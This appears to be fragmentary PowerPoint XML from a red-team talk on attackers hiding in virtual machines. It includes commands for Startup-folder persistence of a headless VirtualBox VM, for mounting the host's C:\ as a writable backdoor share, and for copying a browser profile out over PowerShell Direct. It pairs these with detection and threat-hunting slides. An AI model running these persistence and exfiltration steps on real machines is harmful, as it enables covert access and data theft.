        <p:spPr>
          <a:xfrm>
            <a:off x="2964873" y="3110439"/>
            <a:ext cx="1302328" cy="6371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7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036B98-8DFC-40E7-A531-95FE960E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844" y="2515214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Persistence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 descr="Infinity">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365C748B-1FDF-4E1B-8507-8F2DBB120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4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AD8D1-8FBE-48C0-96E7-15A96EFDF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Persistence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8A4BC-1E74-4910-8707-7F92BB921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Ensure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>VM launches upon reboot of host machine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Most VM software has this built in, some need </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a bit of hand holding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Creation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Shared Folder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to access host (backdoor access)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other possible options: Webcam, USB devices, smartcard of host,…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6FAA0-D34A-49F5-A7F7-FA60B99A3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388" y="365126"/>
            <a:ext cx="2151529" cy="26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29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B068A-9359-40B5-A6E4-C6DF0391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VM via Startup Folder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(VirtualBox on Windows)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4A13-258F-4619-BDB2-3AFAD0F93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 solution  `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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config.bat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` with the following command in it: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Save the file to the victim’s startup folder at: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572DF87-383A-4390-BF0E-D4AD97FB9C02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="930087" y="2465484"/>
            <a:ext cx="9670677" cy="8784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start /min "C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" </a:t>
            </a:r>
            <a:b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startvm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"IT Recovery" </a:t>
            </a:r>
            <a:b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–type headless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7E5ED18B-1BA9-4D99-9323-00E471E8C908}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="930087" y="4408940"/>
            <a:ext cx="9670677" cy="3515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%USERPROFILE%\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AppData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\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2746576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6C92-E9BE-4185-AF30-3234E36E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Shared Folders between Guest and Host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7DF07D9-55E0-4E7A-8501-16888812687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2012" y="1892712"/>
            <a:ext cx="10170460" cy="3515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.\VBoxManage.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1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sharedfolder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1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add 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–name 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shadow_c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sz="160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hostpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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c:\ -automount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02012A54-0AF1-4D4C-AC39-6814006D5B14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3545541" y="5018902"/>
            <a:ext cx="5876365" cy="7828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$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sudo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mkdir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mnt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/c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$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sudo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mount -t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vboxsf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shadow_c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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mnt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/c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C6724B-AA4D-4BBB-9F56-589EB2DB1C87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="632011" y="2413337"/>
            <a:ext cx="10789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adds the following lines to the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> xml configuration file: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Inside the Attack VM the drive can be mounted using*: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D3914EB0-D017-4D41-88A2-399B76646285}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3545541" y="2893946"/>
            <a:ext cx="6566648" cy="1347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SharedFolders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&lt;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SharedFolder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name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1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shadow_c</a:t>
            </a:r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hostPath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="c:\" </a:t>
            </a:r>
            <a:b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writable="true"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autoMount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="true"/&gt;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&lt;/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SharedFolders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EF068-B499-48BD-86FC-47ED6CE43347}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5871883" y="5907741"/>
            <a:ext cx="3863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requires VirtualBox Guest Additions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0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BEBFD-B15C-4666-A56A-24D7EFB7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200" dirty="0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59B189-155F-4905-BB67-FD948CD75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2236"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="624530" y="306873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D0EBD4-6A86-41BF-B66F-6D139E2E7E3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5307106" y="2821555"/>
            <a:ext cx="1577787" cy="503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F3E9178-C1B8-4C24-AF4F-0C8FF91194E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3030070" y="2471932"/>
            <a:ext cx="2160495" cy="50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8A158-1AAF-46F7-9C00-ECB6C71F112A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6884893" y="2975292"/>
            <a:ext cx="4303059" cy="14157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got auto-mounted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Could also do manually, via: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/c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mount –t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vboxsf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shadow_c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mnt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73FB91-6AA5-43E6-A991-06545CF21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29" y="5309282"/>
            <a:ext cx="10911841" cy="91857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934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9F26692-F12A-4F9E-9C6D-FABE9A277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BDF44E-531A-4177-A2D6-2D2310D05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104A4-D4CA-4A88-BE59-7E359B1E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53" y="1483033"/>
            <a:ext cx="5946579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Detections and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat Hunting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BFB173A-5EF2-43F4-B3BB-6EA1975FA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3377" y="0"/>
            <a:ext cx="3801784" cy="2254263"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 34084 w 3801784"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2254263"/>
              <a:gd name="connsiteX1" fmla="*/ 3767702 w 3801784"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2254263"/>
              <a:gd name="connsiteX2" fmla="*/ 3791970 w 3801784"/>
              <a:gd name="connsiteY2" fmla="*/ 159016 h 2254263"/>
              <a:gd name="connsiteX3" fmla="*/ 3801784 w 3801784"/>
              <a:gd name="connsiteY3" fmla="*/ 353371 h 2254263"/>
              <a:gd name="connsiteX4" fmla="*/ 1900892 w 3801784"/>
              <a:gd name="connsiteY4" fmla="*/ 2254263 h 2254263"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 3801784"/>
              <a:gd name="connsiteY5" fmla="*/ 353371 h 2254263"/>
              <a:gd name="connsiteX6" fmla="*/ 9815 w 3801784"/>
              <a:gd name="connsiteY6" fmla="*/ 159016 h 225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1784" h="2254263">
                <a:moveTo>
                  <a:pt x="34084" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3767702" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3791970" y="159016"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3798459" y="222918"/>
                  <a:pt x="3801784" y="287757"/>
                  <a:pt x="3801784" y="353371"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3801784" y="1403205"/>
                  <a:pt x="2950726" y="2254263"/>
                  <a:pt x="1900892" y="2254263"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="851058" y="2254263"/>
                  <a:pt x="0" y="1403205"/>
                  <a:pt x="0" y="353371"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="287757"/>
                  <a:pt x="3325" y="222918"/>
                  <a:pt x="9815" y="15901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Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACB6A3DB-33D0-4560-AB66-8C242DFE8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2255" y="177567"/>
            <a:ext cx="1544027" cy="1544027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Freeform 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{726FC37F-1DE8-4A19-A1DE-0A2176ED8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6728" y="3030547"/>
            <a:ext cx="4705272" cy="3827453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81FC7-8124-4E45-8C3F-0C86DD329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20" r="1" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8950452" y="3979441"/>
            <a:ext cx="2281306" cy="2625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801F3-2B21-414E-BE84-ABC9E06CF88A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850852" y="3107596"/>
            <a:ext cx="6702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know adversaries use VMs – and might have done so for a while.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8E36A4-4CC2-4B48-B995-6965FB95DAC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850852" y="3679639"/>
            <a:ext cx="6702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Motivated adversaries likely compile their own </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>virtualization toolkit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>to stay undetected (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>rather then using off the shelve software) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
            </a:b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84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A8EC-8789-48DE-95B8-A5AA089A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E9B88-91A7-4E95-BC1E-52CF9C16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538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Collect and analyze telemetry for virtual machines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>in your environments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Virtual had disk size, memory, network config, shared folders,…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>“Suspicious” command line options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Silent installs, e.g. via command line options (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>–silent and –ignore-reboot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Suppressing notifications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>VBoxManage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>setextradata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> global GUI/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>SuppressMessages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> "all“</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Unexpected calls to Hyper-V commands (New-VM, Start-VM…) or enablement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Auto Start Detection </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Usage of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>VBoxAutostartSvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> service, VBOXAUTOSTART_CONFIG environment variable </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Network traffic analysis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7175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6AA828-2E9A-4DC3-85DE-0E03A0E6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70" y="2053641"/>
            <a:ext cx="3669161" cy="2760098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Defeating the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shadowbunny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5BDBA-2A23-4B10-8C55-A54AA7333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754" y="928255"/>
            <a:ext cx="5306084" cy="8566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Assume</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" cap="none" spc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Breach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2E0A0-3903-42AC-8E54-ED7B656A5272}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8533468" y="2837634"/>
            <a:ext cx="2992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Zero Trust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E3425E-24A4-4494-9D6E-5733AA237B4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5581788" y="4813739"/>
            <a:ext cx="6244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Homefield Advantage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75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5C794-5898-4262-AACC-5CE892AD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342" y="1974949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Questions?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 descr="Badge Question Mark">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E728F0C-63CD-4827-A808-12898E896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328" y="1819656"/>
            <a:ext cx="4142232" cy="41422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AC67D-C977-4409-986C-4E4CE0E62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7342" y="3499878"/>
            <a:ext cx="4460306" cy="12424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johann@wunderwuzzi.net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Twitter: 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@wunderwuzzi23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CEEB1-0504-4482-A5A3-5913D490212E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8475766" y="6369440"/>
            <a:ext cx="4460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6"/>
              </a:rPr>
              <a:t>https://embracethered.com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188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DE406-0D60-490F-A1C8-DBC9C4DE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share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5508C-6BA2-41EE-8D19-FEF6B4F60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evidence that adversaries use virtual machines (at least) for ransomware deployments, hence we need to shine more light on this to have better chances of detecting such attacks.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73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21F2-FCB0-470C-83B0-9BC6210E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5C26-45EB-42FC-903D-11D5C85A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Ragnar Locker ransomware deploys virtual machine to dodge security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>VirtualBox Installation Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(https://docs.oracle.com/en/virtualization/virtualbox/6.0/user/installation_windows.html)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Hyper-V New-VM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(https://docs.microsoft.com/en-us/powershell/module/hyper-v/new-vm?view=win10-ps)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>VBoxManage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> CLI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(https://www.virtualbox.org/manual/ch08.html)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Embrace The Red Blog </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://embracethered.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Shadowbunny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Article (https://pentestmag.com/product/pentest-healthcare-security/)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Cybersecurity Attacks – Red Team Strategies </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(https://www.amazon.com/Cybersecurity-Attacks-Strategies-practical-penetration-ebook/dp/B0822G9PTM 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373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BA05-C29D-4944-9E12-C49D840D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FC6ED-D01A-41CB-B39D-858E818E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5AECB-442C-4995-823A-2FF2DB82A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69291"/>
            <a:ext cx="12192000" cy="46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77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9068-DBA1-4E15-B0DF-44341F72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Hyper-V: Persistent PowerShell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BCF6F-AA50-4FFA-83F8-C9BB2474B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Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>On host run: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cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Copy files from host &lt;-&gt; VM:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"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br>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Remove the session again: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Copy files from VM to host:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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7347834A-069D-41B9-8D26-973C1C2D7302}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="919696" y="3463108"/>
            <a:ext cx="11021291" cy="3485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Copy-Item </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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ToSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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$s -Path C:\host_path\data.txt -Destination C:\guest_path\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758B0B4B-B819-431B-B7D1-A4440671A829}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="919696" y="2363811"/>
            <a:ext cx="11021291" cy="3485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$s = New-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PSSession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VMName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-Credential (Get-Credential)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3430EE80-75B3-4ECA-8133-1DBFBD0AE868}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="919696" y="4001294"/>
            <a:ext cx="11021291" cy="3485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Copy-Item </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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FromSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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$s -Path C:\Users\Browser_Profile\ -Destination C:\exfil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32CA864-6266-4B45-BDBD-FACCAC985C66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="919696" y="5274869"/>
            <a:ext cx="11021291" cy="3485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Remove-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PSSession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$s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1136183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334FC-2D65-4F4E-AE06-9250AA20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Alternative: Using Hyper-V on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62506-11C6-43E3-A595-60E0B0EB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vmconnect</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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ourier New" panose="020703090202050204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PowerShell Direct Connections from Host to VM (on same machine):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Invoke-Command -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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Enter-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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PSSession</a:t>
            </a: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en-US" sz="18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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1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VMName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"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3130E-8DC9-458E-8ACB-FC9134FA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1825625"/>
            <a:ext cx="5232400" cy="28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44BF-EBC6-41F6-8EAE-CBBB04B4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/>
              <a:t>The origins of the Shadowbunny</a:t>
            </a:r>
            <a:endParaRPr lang="en-S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F465E9-37A9-4EA2-AC71-248DF2D99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082" y="3520151"/>
            <a:ext cx="4539435" cy="2593340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18" descr="A close up of a screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{645E9763-9D0D-4EE1-9AA3-609F4F9A9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81" y="2858868"/>
            <a:ext cx="3088624" cy="1322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9CC1B3-7FEC-4F5E-B302-17338006D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256" y="2197586"/>
            <a:ext cx="4281963" cy="30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6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D1309-F768-4C1E-BF48-2C883CFC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2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B8D87A-A099-4A2D-866D-7CD0FF6028C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1502" y="986128"/>
            <a:ext cx="5719913" cy="5396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702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32E6-61B9-4B92-9E54-5BB7730E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use virtual machines as attacker?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37C36-2D59-4FEC-B5DB-14CCAF44D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VM is entirely attacker controlled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No monitoring or security controls inside the VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistence &amp; backdoor access to host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Evasion &amp; Obfuscation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Seems not well researched or known about</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interesting side effect: Limits damage untrusted code might cause</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="416836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44BF-EBC6-41F6-8EAE-CBBB04B42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Ragnar Locker Ransomware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D4205-AEAD-456E-B1CE-B2075C6E1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9503D4-7232-4C53-B461-C7C644641C88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3395133" y="5653743"/>
            <a:ext cx="920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Ragnar Locker ransomware deploys virtual machine to dodge security </a:t>
            </a:r>
            <a:b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(https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/)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AD042-2334-476D-A25E-34CFC609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46" y="2409456"/>
            <a:ext cx="116490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3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1712</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>297</Paragraphs>
  <Slides>53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Bahnschrift</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Beware of the Shadowbunny</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>What is a Shadowbunny?</vt:lpstr>
      <vt:lpstr>Why share this?</vt:lpstr>
      <vt:lpstr>The origins of the Shadowbunny</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
